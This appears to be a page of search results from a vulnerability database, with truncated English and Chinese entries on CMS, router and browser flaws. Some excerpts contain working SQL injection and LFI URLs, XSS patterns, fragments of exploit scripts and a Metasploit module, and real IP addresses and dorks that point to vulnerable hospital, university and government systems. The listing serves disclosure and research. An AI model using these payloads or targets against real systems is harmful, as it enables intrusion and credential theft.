56796 matches found
Drupal up to 7.38 Ajax Handler a Tag cross site scripting
No description provided by source...
Cyberoam - Blind SQL Injection
Description The username field in the captive portal of Cyberoam NG firewall is vulnerable to SQL Injection and can be exploited to execute sql commands on the database. The username field is vulnerable to the following types of SQL Injections a Boolean-based blind sql injection b Stacked...
Apple OS X Entitlements Rootpipe Privilege Escalation
This module exploits the rootpipe vulnerability and bypasses Apple's initial fix for the issue by injecting code into a process with the 'admin.writeconfig' entitlement.https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/...
Sudo <= 1.8.14 - Unauthorized Privilege
Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation Date: 07-23-2015 Exploit Author: Daniel Svartman Version: Sudo =1.8.14 Tested on: RHEL 5/6/7 and Ubuntu all versions CVE: CVE-2015-5602. Hello, I found a security bug in sudo checked in the latest versions of sudorunning...
Microsoft Internet Explorer 缓冲区溢出漏洞 ms15-093
当 Internet Explorer 不正确地访问内存中的对象时,存在远程执行代码漏洞。此漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式损坏内存。攻击者可能拥有一个旨在通过 Internet Explorer 利用此漏洞的经特殊设计的网站,然后诱使用户查看该网站,则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。频繁使用 Internet Explorer...
Ganglia Web Frontend < 3.5.1 - PHP Code Execution
Assuming that ganglia is installed on the target machine at this path:/var/www/html/ganglia/ 2. Assuming the attacker has minimal access to the target machine and can write to "/tmp". There are several methods where a remote attacker can also trigger daemons or other system processes to create...
Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability
Wordpress Plugin 'WP Mobile Edition' is not filtering data so we can get the configration file in the path site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php CoderLeeT | Fallag...
Schneider Electric Modicon M340 PLC Station P34模块Web Servers安全漏洞
漏洞详情:Schneider Electric Modicon M340 PLC Station P34 module是法国施耐德电气(Schneider Electric)公司的一款可编程控制器。Schneider Electric Modicon M340 PLC Station P34模块中存在安全漏洞。远程攻击者可利用该漏洞获取敏感信息,在Web服务器进程上下文中执行任意代码,绕过身份验证机制,获取受影响设备的访问权限。漏洞类型远程利用影响硬编码身份认证是远程代码执行本地文件包含否目录遍历/文件篡改远程代码包含是远程代码执行/拒绝服务攻击跨站脚本攻击是获取敏感信息影响设备版本:...
Google Analyticator Multiple XSS Vulnerabilities
Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4: Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator Parameter Name gaadsense Parameter Type POST Attack Pattern x'" onmouseover=alert9 Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticato...
OpenSSH keyboard-interactive authentication brute force vulnerability
OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 6.9及之前版本的sshd中的auth2-chall.c文件中的‘kbdintnextdevice’函数存在安全漏洞。远程攻击者利用该漏洞可借助ssh -oKbdInteractiveDevices选项中较长且重复的列表实施暴力破解攻击,或造成拒绝服务(CPU消耗)。 ---snip--- diff...
SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability
CVE-2012-4939SolarWinds Orion IP Address Manager IPAM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affect...
WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files: 50 $file = urldecode$args'file' ; 51 $fh = fopen$file, 'r' or die'Unable to load file, something bad has happened.' ; 52 53 while !feof$fh 54 $txt .= fread$fh, 1024 ; 55 56 //...
Edimax PS-1206MF Web Admin Auth Bypass
By default, it is necessary to know current password in order to change it, but when request will be missing POST anewpass & confpass parameters, admin password will be set to null. devil@hell:$ curl -gi http://192.168.0.10/ HTTP/1.1 401 Date: Sat, 21 Dec 1996 12:00:00 GMT WWW-Authenticate: Basic...
乐知行数字校园系统本地包含漏洞
No description provided by source...
Firefox < 39.0.3 - pdf.js Same Origin Policy Exploit
CVE-2015-4495Description:This exploit allow attacker to read and copy information on victim's computer, once they view the web site crafted with this exploit. //exploit.js: var starttimeout=2000; var sandboxcontexti=null; var DIRCACHE=; var FILECACHE=; var hidden=true; var mywinid=null; function...
Wireshark ZigBee解析器输入验证漏洞
Wireshark 1.12.7之前1.12.x版本的ZigBee解析器中的epan/dissectors/packet-zbee-security.c文件中的‘dissectzbeesecure’函数存在安全漏洞,该漏洞源于程序不正确地依赖数据包数据中包含的长度字段。远程攻击者可通过发送特制的数据包利用该漏洞造成拒绝服务(应用程序崩溃)。...
WordPress NewStatPress Plugin 0.9.8 xss+sql注入
主题地址:https://wordpress.org/plugins/newstatpress/影响版本:0.9.8Active installs: 20,000+CVE: CVE-2015-4062, CVE-2015-40631)sql注入 CWE-89 CVE-2015-4062 CODE:includes/nspsearch.php:94for$i=1;$i=3;$i++ if$GET"what$i" != '' && $GET"where$i" != '' $where.=" AND ".$GET"where$i"." LIKE '%".$GET"what$i"."%'";...
Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabili
CVE-2010-2032Caucho Resin Professional is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of...
Zimbra 'view' Parameter Cross Site Scripting Vulnerability
CVE-2012-1213Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the...
WordPress Shopping Cart 3.0.4 --任意文件上传
受影响版本: WordPress Shopping Cart 3.0.4 日期: 29-10-2014 软件链接: https://wordpress.org/plugins/wp-easycart/ CVE: CVE-2014-9308 类别: 应用程序漏洞详情:任何注册用户都可以上传任何文件。上传点: wp-easycart\inc\amfphp\administration\banneruploaderscript.php$date = $POST'datemd5';$usersqlquery = sprintf"SELECT ecuser., ecrole.adminaccess...
DedeCMS 5.7 /plus/flink_add.php SQL注入漏洞
common.inc.php这里开始过滤得很完整,往下看//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数PHPphp if$FILES requireonceDEDEINC.'/uploadsafe.inc.php'; uploadsafe.inc.php//29行 $$key = $FILES$key'tmpname' = strreplace"\\", "\", $FILES$key'tmpname'; 能绕过 GPCplus\flink.php虽然都经过...
espcms最新版两处高危SQL注入漏洞附分析(遗漏未修复)
简要描述: 绝对是最新版本! 版本信息:V6.4.15.08.25 UTF8 正式版 更新时间:2015-08-25 12:29:04 软件大小:7.67MB 25号更新的,有两处高危注入没有修复 详细说明: 第一处在 在enquiry.php中 $ptitle = $this-fun-accept'ptitle', 'P'; $tsn = $this-fun-accept'tsn', 'P'; $did = $this-fun-accept'did', 'P'; if empty$did || empty$amount || empty$ptitle $enquirylink =...
Apple Mac OS X 10.10.5缓冲区溢出漏洞
No description provided by source...
Werkzeug 调试模式 命令执行
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex' class Metasploit4 'Werkzeug Debug Shell Command Execution', 'Description' = %q This module will exploi...
WordPress Googmonify Plugin 0.8.1 - XSS/CSRF
Vulnerable Code : googmonify.php - Line 190,194,208input id="PID" name="PID" type="text" value="?php echo $pid; ?"input id= "Limit" name="Limit" type="text" value="?php echo $limit;?" size="5"...
Multiple EMC RSA Products ESA-2015-081 Multiple Security Vulnerabilities
受影响的产品: RSA BSAFE Micro Edition Suite MES all 4.1.x versions prior to 4.1.3 RSA BSAFE Micro Edition Suite MES all 4.0.x versions prior to 4.0.8 RSA BSAFE Crypto-C Micro Edition Crypto-C ME 4.1 RSA BSAFE Crypto-C Micro Edition Crypto-C ME all versions prior to 4.0.4 RSA BSAFE Crypto-J all versions...
Discuz利用UC_KEY进行前台getshell2
简要描述: http://drops.wooyun.org/papers/7830 其实这里已经说得比较明白了。 利用这个漏洞已经好些时候,包括之前腾讯的shellhttp://www.wooyun.org/bugs/wooyun-2010-092923 不过好像官方还是不太重视,特意再提一下,不用登陆后台,直接前台能利用(顺便打卡^-^) 乌云搜索uckey会有很多惊喜哦。 详细说明: \api\uc.php function updatebadwords$get, $post global $G; if!APIUPDATEBADWORDS return...
Pligg CMS 2.0.2 CSRF漏洞
创建一个新文件,然后写入一个web后门,拿到webshell. 我们可以用另外一个方法也是可以用来getshell,先利用第一个漏洞编辑站点目录index.php,接着我们编辑保存下。 然后运保存成功后,查看index.php,然后就生成了test.php文件...
ESPCMS的最新版后台登入绕过
简要描述: 8.25 V6.4.15.08.25 捡漏 详细说明: 在加密算法那 ,一般情况下我们是不能再还原出key了。 他加了这么一段代码 function eccode$string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true $result = null; if $operation == 'ENCODE' if extensionloaded'mcrypt' && $mcrype $result = $this-encryptCookie$string, $key; else...
IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution
IBM Security AppScan Standard OLE Automation Array Remote Code Execution Author: Naser Farhadi Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 Date: 1 June 2015 Version: = 9.0.2 Tested on: Windows 7 Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ if...
ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal
No description provided by source. !/usr/bin/env python -- coding: UTF-8 -- import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class TestPOCPOCBase: vulID = '89268' version = '1' vulDate = '1431878400' createDate = '1442937600'...
74cms最新版重置任意账号密码
简要描述: 密码重置机制可以绕过,同时可重置任意账号密码 demo测试成功 详细说明: 先看下 \user\usergetpass.php $act = !empty$REQUEST'act' ? trim$REQUEST'act' : 'enter'; $smarty-assign'headernav',"getpass"; if $act=='enter' $smarty-assign'title','找回密码 - '.$CFG'sitename'; $token=substrmd5mtrand100000, 999999, 8,16; //生成token...
WDS CMS /wds_news/article.php SQL注入
Exploit : http:// Target/wdsnews/article.php?ID=-1+union+select+1,groupconcatusername,0x3a,password,3,4,5,6,7,8,9,10+from+cmsadmin-- Upload Shell : http://Target/wdsnews/admin.php?mode=listfile Shell Path : http://Target/wdsnews/filer/shell.php...
亿邮网关未验证登陆即可进入查看用户邮件信息
简要描述: 漏洞导致亿邮网关可以不需要亿邮的登陆即可进入,只需要用户的邮箱地址即可登入,查看用户的邮箱操作与相关信息。 详细说明: /gw/user/php/user/userlogin.php?userid=XXX XXX为用户邮箱地址,只要知道邮箱地址即可进入用户网关,不知道也可以爆破 漏洞证明: 通过详细说明中的地址即可跳转过来了。...
金碟医疗广州儿童医院存在弱口令可影响整个医院的信息安全
简要描述: 详细说明: 1.广州妇女儿童医院的在线挂号系统,金碟和支付宝合作的。。。 这系统一到放号源时速度就变慢,像蜗牛,,,看这界面真有点怀疑。。。。 2.扫一扫 nmap 113.108.182.53 Starting Nmap 6.47 http://nmap.org at 2015-08-29 08:13 CST Nmap scan report for 113.108.182.53 Host is up 0.091s latency. Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http...
Cisco TelePresence Video Communication Server Expressway 信息泄露漏洞
Cisco TelePresence Video Communication Server(VCS)Expressway是美国思科(Cisco)公司的一款网真视频通信服务器,它能够与统一通信和语音通信环境集成,从而为使用各种通信工具的最终用户提供最佳体验。Cisco TelePresence VCS Expressway X8.5.2版本中存在安全漏洞。远程攻击者可借助Mobile and Remote AccessMRA角色并创建TFTP会话,利用该漏洞绕过既定的访问限制,读取配置文件。...
省级农机购置补贴信息管理系统后门
所有参数均使用post方式提交、同时进行base64的加密和解密操作。可直接读写文件、可直接执行sql操作(下面给的例子直接查出管理员用户名密码)。 htmlform action="http://218.77.183.70/njbt2013/SystemManager/njssqy.aspx" name="test" method="post" enctype="multipart/form-data"input type="hidden" name="method" size="23" id="method" value="c3Fs" / sql //input...
Keeper IP Camera 3.2.2.10 - Authentication Bypass
增加权限验证...
迪普UMC统一管理系统SQL注入
DPtech UMC统一管理中心案例:http://222.171.148.161/UMC/Login.action http://222.75.152.197:8080/UMC/Login.action http://222.47.70.3:8080/UMC/Login.action http://218.28.177.149/UMC/Login.action http://211.138.102.195:8080/UMC/Login.action针对部分型号,并不通杀。POST /UMC/Login.action HTTP/1.1 Host: 222.171.148.161...
XR网关平台SQL注入
在IP/msa/main.xp ,username处存在SQL注入(post) !/usr/bin/env python coding=utf-8 import requests def login: url = target + '/msa/main.xp' data = 'Fun':'msaAdminLogon', 'username': "admin' or'1'='1", 'password': '123456' req = requests.posturl = url, data = data print req.text def download: url = target ...
Tendoo CMS 1.3 - XSS Vulnerabilities
Introduction :a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMSMake CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... . Stored Xss In http://localhost/tendoo/index.php/account/update In FirstName and Last Name InputsExcute Java Script Codes And If Admin ...
泛微某系统存在通用型注入(以官网和中国移动为例)
简要描述: 唉,据说都不关注它了? 详细说明: 以官网系统为例 首先我们看看登陆的时候的返回值 http://.../login.do?message=102&verify= http://.../login.do?message=103&verify= 那么现在我们可以抓包开始注入了 构造好万能登陆句子,成功登陆后台。。 MD5密码解出来为1 https://images.seebug.org/upload/201508/251408519374f80cad29bf6f64db873598ae86e0.png img src="https://images.seebug.or...
Joomla com_informations component SQL Injection vulnerability
验证方法: http://target/index.php?option=cominformations&view=sousthemes&themeid=-3 SQLI Injected column is 3 http://target//index.php?option=cominformations&view=sousthemes&themeid=999.9+union+select+111,222,version%23...
Raonet Subscriber Ethernet Router MySQL 数据库账户密码泄露
Raonet SER-500 路由器 MySQL 账户密码泄漏, 可远程登录, 高权限. 验证地址: http://61.77.63.86/inc/conndb.inc Google dork: intitle:Raonet Subscriber Ethernet Router !/usr/bin/env python import urlparse import re import urllib2 def assignservice, arg: if service != "www": return arr = urlparse.urlparsearg return True,...
D-Link Cookie Command Execution
This module exploits an anonymous remote upload and code execution vulnerability on different D-Link devices. The vulnerability is a command injection in the cookie handling process of the lighttpd web server when handling specially crafted cookie values. This module has been successfully tested ...
网康VPN设备6.3.1越权访问
网康vpn设备虽然设置了授权访问,但是大部分页面可以越权绕过访问。1,https://xx.xx.xx.x/vpnweb/bulletin.php?para=admin/index.php绕过认证直接访问后台认证,使用burp抓包,得到url地址!网康vpn设备设计缺陷,可以远程直接重启。直接访问vpn设备的地址https://xxx.xx.xx.xx//admin/devicestatus.php点击重启,直接可以重启设备!影响的型号为6.3.1版本...
校园卡电子服务平台卡号查询功能未授权访问
管理员查询用户姓名、卡号的功能可未授权访问,导致攻击者可通过遍历卡号的方式获取所有用户姓名、卡号信息,关键问题是,这个校园卡服务平台的卡号默认口令为888888,部分用户可能未修改默认口令,导致攻击者获取卡号信息后,可尝试使用默认口令登录,且此平台涉及在线支付功能,与此平台可SSO登录,因此可能影响用户校园卡账户资金。谷歌关键词:校园卡电子服务平台,可获得以下用户存在此问题。山东大学:http://card.sdu.edu.cn/Account/SearchUserInfo中国石油大学:http://card.upc.edu.cn/Account/SearchUserInfo河北工业大学...
天空教室选课通用管理系统任意文件上传漏洞
注册个教师发布课程账号,在2D课程选课列表上传中,可上传任意文件。可以GetShell...
Discuz 7.2 反射型xss漏洞
测试链接:目标IP:/logging.php?action=logout&formhash=b1abb3e2&referer=%27-alert%28document.domain%29-...
74cms 20150817 设计缺陷导致8处不同文件注入(gpc=off)
简要描述: 直接出数据。 详细说明: http://download.74cms.com/download/74cmsv3.6beta20150817.zip 下载地址。 74cms的全局文件是include/common.inc.php 其中里面有 if !empty$GET $GET = help::addslashesdeep$GET; if !empty$POST $POST = help::addslashesdeep$POST; $COOKIE = help::addslashesdeep$COOKIE; $REQUEST =...